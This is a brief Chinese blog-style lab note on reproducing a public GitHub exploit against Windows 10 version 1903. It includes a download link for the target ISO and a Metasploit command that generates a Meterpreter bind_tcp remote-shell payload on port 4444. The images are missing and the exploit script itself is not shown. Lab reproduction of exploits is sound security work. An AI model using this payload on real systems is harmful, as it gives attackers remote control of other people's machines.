看到 GitHub 上面有对应的 exp,就复现看看。
![image-20200608145057355]()
image-20200608145057355
复现
靶机地址
1
| ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/
|
使用 msf 生成对应 payload
1
| sfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
|
使用 python3 运行脚本即可。
![image-20200608145057355]()
image-20200608145057355
msf 配置
![]()